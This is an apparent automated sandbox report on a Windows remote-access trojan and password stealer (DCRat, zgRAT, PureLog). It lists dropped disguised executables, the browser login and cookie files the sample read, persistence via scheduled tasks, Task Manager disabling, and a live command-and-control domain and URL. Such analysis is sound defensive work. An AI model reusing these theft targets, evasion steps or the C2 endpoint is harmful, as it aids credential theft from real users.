                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 1znAXdPcM5.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Agentcomponentbrokermonitordhcp.exe PID: 600, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7448, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7580, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 1znAXdPcM5.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 1znAXdPcM5.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		21
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager137
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                    Software Packing                                    		NTDS221
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts122
                                    Masquerading                                    		Cached Domain Credentials131
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Modify Registry                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583022 Sample: 1znAXdPcM5.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 72 891781cm.renyash.ru 2->72 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Antivirus detection for URL or domain 2->80 82 16 other signatures 2->82 11 1znAXdPcM5.exe 3 13 2->11         started        14 aXnWbWpBWYJmkhPMHrrUNM.exe 2->14         started        18 Agentcomponentbrokermonitordhcp.exe 2 2->18         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 52 C:\...\Agentcomponentbrokermonitordhcp.exe, PE32 11->52 dropped 54 jb23QgoxZwrgcyya3I...gDGXuWLnkOXZaTu.vbe, data 11->54 dropped 22 wscript.exe 1 11->22         started        74 891781cm.renyash.ru 104.21.38.84, 49730, 49733, 49734 CLOUDFLARENETUS United States 14->74 56 C:\Users\user\Desktop\ebskEcaT.log, PE32 14->56 dropped 58 C:\Users\user\Desktop\XeElcNfe.log, PE32 14->58 dropped 60 C:\Users\user\Desktop\ToOuVQfl.log, PE32 14->60 dropped 62 C:\Users\user\Desktop\HBUOKBdR.log, PE32 14->62 dropped 100 Tries to harvest and steal browser information (history, passwords, etc) 14->100 file6 signatures7 process8 signatures9 84 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->84 25 cmd.exe 1 22->25         started        process10 process11 27 Agentcomponentbrokermonitordhcp.exe 3 19 25->27         started        31 reg.exe 1 1 25->31         started        33 conhost.exe 25->33         started        file12 64 C:\Users\user\Desktop\axSbriXt.log, PE32 27->64 dropped 66 C:\Users\user\Desktop\QPyLHGSL.log, PE32 27->66 dropped 68 C:\Users\user\Desktop\IlqWXNCe.log, PE32 27->68 dropped 70 6 other malicious files 27->70 dropped 88 Antivirus detection for dropped file 27->88 90 Multi AV Scanner detection for dropped file 27->90 92 Machine Learning detection for dropped file 27->92 98 3 other signatures 27->98 35 cmd.exe 1 27->35         started        37 schtasks.exe 27->37         started        39 schtasks.exe 27->39         started        41 16 other processes 27->41 94 Disable Task Manager(disabletaskmgr) 31->94 96 Disables the Windows task manager (taskmgr) 31->96 signatures13 process14 process15 43 aXnWbWpBWYJmkhPMHrrUNM.exe 35->43         started        46 conhost.exe 35->46         started        48 chcp.com 35->48         started        50 w32tm.exe 35->50         started        signatures16 86 Multi AV Scanner detection for dropped file 43->86

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    1znAXdPcM5.exe49%VirustotalBrowse
                                    1znAXdPcM5.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    1znAXdPcM5.exe100%AviraVBS/Runner.VPG
                                    1znAXdPcM5.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\QPyLHGSL.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat100%AviraBAT/Delbat.C
                                    C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\axSbriXt.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\XeElcNfe.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\ebskEcaT.log100%AviraTR/AVI.Agent.updqb
                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\axSbriXt.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\XeElcNfe.log100%Joe Sandbox ML
                                    C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\IlqWXNCe.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ToOuVQfl.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\GoOOBNnj.log25%ReversingLabs
                                    C:\Users\user\Desktop\HBUOKBdR.log25%ReversingLabs
                                    C:\Users\user\Desktop\IlqWXNCe.log8%ReversingLabs
                                    C:\Users\user\Desktop\QPyLHGSL.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\ToOuVQfl.log8%ReversingLabs
                                    C:\Users\user\Desktop\XeElcNfe.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\axSbriXt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\ebskEcaT.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://891781cm.renyash.ru/100%Avira URL Cloudmalware
                                    http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php100%Avira URL Cloudmalware
                                    http://891781cm.renyash.ru100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    891781cm.renyash.ru
                                    		104.21.38.84
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designersGaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                		high
                                                http://www.fontbureau.com/designers/?aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bTheaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                      		high
                                                      http://www.fontbureau.com/designers?aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                          		high
                                                          http://www.tiro.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                              		high
                                                              http://www.fontbureau.com/designersaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.goodfont.co.kraXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                    		high
                                                                    http://www.carterandcone.comlaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sajatypeworks.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.typography.netDaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.founder.com.cn/cn/cTheaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.galapagosdesign.com/staff/dennis.htmaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.founder.com.cn/cnaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers/frere-user.htmlaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://891781cm.renyash.ru/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                                        		high
                                                                                        http://www.jiyu-kobo.co.jp/aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/DPleaseaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.com/designers8aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fonts.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.sandoll.co.kraXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.urwpp.deDPleaseaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.zhongyicts.com.cnaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://891781cm.renyash.ruaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003190000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002B16000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAgentcomponentbrokermonitordhcp.exe, 00000005.00000002.1742549367.000000000313E000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sakkal.comaXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4170265860.000000001E9F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.drfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            104.21.38.84
                                                                                                            		891781cm.renyash.ruUnited States
                                                                                                            		13335CLOUDFLARENETUStrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1583022
                                                                                                            Start date and time:2025-01-01 15:01:05 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 56s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:40
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:1znAXdPcM5.exe
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:e656db3deb4cf58570317e64607c5420.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@41/38@1/1
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 71.4%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 51%
                                                                                                            • Number of executed functions: 397
                                                                                                            • Number of non-executed functions: 118
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                            Warnings

